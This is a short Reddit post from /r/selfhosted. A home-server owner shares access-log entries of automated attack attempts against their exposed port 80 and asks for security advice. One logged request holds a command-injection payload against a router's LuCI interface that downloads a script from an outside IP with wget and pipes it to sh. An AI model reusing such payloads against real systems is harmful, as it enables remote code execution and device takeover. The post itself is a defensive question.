The original post: /r/selfhosted by /u/Thin_Newspaper_9594 on 2024-07-01 17:29:29.

As soon as I started to forward port 80 of my router to my server. I noticed that I am getting attacked. They just seem to try out some old exploits for software I do not have installed, but anyway it kind of got me thinking more about security. Here are some examples:

"GET /manager/html HTTP/1.1" 404 Not Found

"PRI %2A HTTP/2.0" 404 Not Found

"GET /cgi-bin/luci/%3Bstok%3D/locale?orm=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 Not Found

"POST /cmd%2C/simZysh/register_main/setCookie HTTP/1.1" 404 Not Found

I am running an old mini-pc with ubuntu-server everything is up-to-date. I run pi-hole in a container. Ddclient to update my dynamic IP and a small django website just for fun. What security measures would you suggest to me?